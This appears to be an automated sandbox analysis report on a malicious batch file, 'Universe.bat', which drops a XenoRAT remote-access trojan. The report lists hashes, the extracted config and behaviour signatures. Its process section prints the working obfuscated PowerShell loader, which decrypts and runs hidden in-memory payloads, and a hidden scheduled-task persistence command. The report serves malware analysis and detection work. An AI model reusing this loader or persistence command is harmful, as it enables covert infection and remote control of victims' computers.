Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
23-08-2024 10:07
Static task
static1
General
-
Target
Universe.bat
-
Size
266KB
-
MD5
b20843491bae175a8a3ea58950133d1a
-
SHA1
33552409f87c4b04f1a97e21c181e27327e0f847
-
SHA256
d78ea86672081dae69afc22f94de2ce5e6867653d42d9bb8d215703be3f9f25c
-
SHA512
998bfa168786a28b6d5dc1d682ee7a75eceee58980a4a643c6c89d52a521bc592aa261c653d24f697c4e092379f63816344ff3667a6acb9d21bbeb2016d8c18b
-
SSDEEP
6144:J4blXryzoC5iq4a8PLJlAl0bBt1Az2iZg7Z8esqA4zX:ibc8ICa8PNC0blH9dsqh
Malware Config
Extracted
xenorat
127.0.0.1
Xeno_rat_nd8912d
-
delay
5000
-
install_path
nothingset
-
port
4444
-
startup_name
nothingset
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4024 powershell.exe 572 powershell.exe 4152 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1735401866-3802634615-1355934272-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4024 powershell.exe 4024 powershell.exe 572 powershell.exe 572 powershell.exe 4152 powershell.exe 4152 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4024 powershell.exe Token: SeDebugPrivilege 572 powershell.exe Token: SeIncreaseQuotaPrivilege 572 powershell.exe Token: SeSecurityPrivilege 572 powershell.exe Token: SeTakeOwnershipPrivilege 572 powershell.exe Token: SeLoadDriverPrivilege 572 powershell.exe Token: SeSystemProfilePrivilege 572 powershell.exe Token: SeSystemtimePrivilege 572 powershell.exe Token: SeProfSingleProcessPrivilege 572 powershell.exe Token: SeIncBasePriorityPrivilege 572 powershell.exe Token: SeCreatePagefilePrivilege 572 powershell.exe Token: SeBackupPrivilege 572 powershell.exe Token: SeRestorePrivilege 572 powershell.exe Token: SeShutdownPrivilege 572 powershell.exe Token: SeDebugPrivilege 572 powershell.exe Token: SeSystemEnvironmentPrivilege 572 powershell.exe Token: SeRemoteShutdownPrivilege 572 powershell.exe Token: SeUndockPrivilege 572 powershell.exe Token: SeManageVolumePrivilege 572 powershell.exe Token: 33 572 powershell.exe Token: 34 572 powershell.exe Token: 35 572 powershell.exe Token: 36 572 powershell.exe Token: SeIncreaseQuotaPrivilege 572 powershell.exe Token: SeSecurityPrivilege 572 powershell.exe Token: SeTakeOwnershipPrivilege 572 powershell.exe Token: SeLoadDriverPrivilege 572 powershell.exe Token: SeSystemProfilePrivilege 572 powershell.exe Token: SeSystemtimePrivilege 572 powershell.exe Token: SeProfSingleProcessPrivilege 572 powershell.exe Token: SeIncBasePriorityPrivilege 572 powershell.exe Token: SeCreatePagefilePrivilege 572 powershell.exe Token: SeBackupPrivilege 572 powershell.exe Token: SeRestorePrivilege 572 powershell.exe Token: SeShutdownPrivilege 572 powershell.exe Token: SeDebugPrivilege 572 powershell.exe Token: SeSystemEnvironmentPrivilege 572 powershell.exe Token: SeRemoteShutdownPrivilege 572 powershell.exe Token: SeUndockPrivilege 572 powershell.exe Token: SeManageVolumePrivilege 572 powershell.exe Token: 33 572 powershell.exe Token: 34 572 powershell.exe Token: 35 572 powershell.exe Token: 36 572 powershell.exe Token: SeIncreaseQuotaPrivilege 572 powershell.exe Token: SeSecurityPrivilege 572 powershell.exe Token: SeTakeOwnershipPrivilege 572 powershell.exe Token: SeLoadDriverPrivilege 572 powershell.exe Token: SeSystemProfilePrivilege 572 powershell.exe Token: SeSystemtimePrivilege 572 powershell.exe Token: SeProfSingleProcessPrivilege 572 powershell.exe Token: SeIncBasePriorityPrivilege 572 powershell.exe Token: SeCreatePagefilePrivilege 572 powershell.exe Token: SeBackupPrivilege 572 powershell.exe Token: SeRestorePrivilege 572 powershell.exe Token: SeShutdownPrivilege 572 powershell.exe Token: SeDebugPrivilege 572 powershell.exe Token: SeSystemEnvironmentPrivilege 572 powershell.exe Token: SeRemoteShutdownPrivilege 572 powershell.exe Token: SeUndockPrivilege 572 powershell.exe Token: SeManageVolumePrivilege 572 powershell.exe Token: 33 572 powershell.exe Token: 34 572 powershell.exe Token: 35 572 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 420 wrote to memory of 4024 420 cmd.exe 83 PID 420 wrote to memory of 4024 420 cmd.exe 83 PID 4024 wrote to memory of 572 4024 powershell.exe 84 PID 4024 wrote to memory of 572 4024 powershell.exe 84 PID 4024 wrote to memory of 2884 4024 powershell.exe 87 PID 4024 wrote to memory of 2884 4024 powershell.exe 87 PID 2884 wrote to memory of 5348 2884 WScript.exe 88 PID 2884 wrote to memory of 5348 2884 WScript.exe 88 PID 5348 wrote to memory of 4152 5348 cmd.exe 90 PID 5348 wrote to memory of 4152 5348 cmd.exe 90
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Universe.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SnMKy725nJUhiMQ+k00yZGWuadijDwJVVBtPnLEkkhk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('axNyr+j+G5sbsmbLId0ybw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FYtig=New-Object System.IO.MemoryStream(,$param_var); $DgoBB=New-Object System.IO.MemoryStream; $zfUXx=New-Object System.IO.Compression.GZipStream($FYtig, [IO.Compression.CompressionMode]::Decompress); $zfUXx.CopyTo($DgoBB); $zfUXx.Dispose(); $FYtig.Dispose(); $DgoBB.Dispose(); $DgoBB.ToArray();}function execute_function($param_var,$param2_var){ $dTUPB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vjclB=$dTUPB.EntryPoint; $vjclB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Universe.bat';$KcJLn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Universe.bat').Split([Environment]::NewLine);foreach ($wEtNx in $KcJLn) { if ($wEtNx.StartsWith(':: ')) { $xAoQG=$wEtNx.Substring(3); break; }}$payloads_var=[string[]]$xAoQG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_735_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_735.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_735.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_735.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:5348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SnMKy725nJUhiMQ+k00yZGWuadijDwJVVBtPnLEkkhk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('axNyr+j+G5sbsmbLId0ybw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FYtig=New-Object System.IO.MemoryStream(,$param_var); $DgoBB=New-Object System.IO.MemoryStream; $zfUXx=New-Object System.IO.Compression.GZipStream($FYtig, [IO.Compression.CompressionMode]::Decompress); $zfUXx.CopyTo($DgoBB); $zfUXx.Dispose(); $FYtig.Dispose(); $DgoBB.Dispose(); $DgoBB.ToArray();}function execute_function($param_var,$param2_var){ $dTUPB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vjclB=$dTUPB.EntryPoint; $vjclB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_735.bat';$KcJLn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_735.bat').Split([Environment]::NewLine);foreach ($wEtNx in $KcJLn) { if ($wEtNx.StartsWith(':: ')) { $xAoQG=$wEtNx.Substring(3); break; }}$payloads_var=[string[]]$xAoQG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4152
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
266KB
MD5b20843491bae175a8a3ea58950133d1a
SHA133552409f87c4b04f1a97e21c181e27327e0f847
SHA256d78ea86672081dae69afc22f94de2ce5e6867653d42d9bb8d215703be3f9f25c
SHA512998bfa168786a28b6d5dc1d682ee7a75eceee58980a4a643c6c89d52a521bc592aa261c653d24f697c4e092379f63816344ff3667a6acb9d21bbeb2016d8c18b
-
Filesize
115B
MD551b89ca272e0cdf63b5c4093d5ca4df2
SHA19c46b103a32ebd4a3e84dd969609cb344555ba02
SHA2563530dd622ef7dc0e24018bd889e878d3219c7396a71d80438d970561c7a8f02a
SHA5121ca0074d9d024120a94b1ad0548ba9c3b32758c2330c5339b3f2eb7360f24c7f06353852d3496aa5c241ceab6ff45f6918eaf21e4ab203787bf75391a5c5625f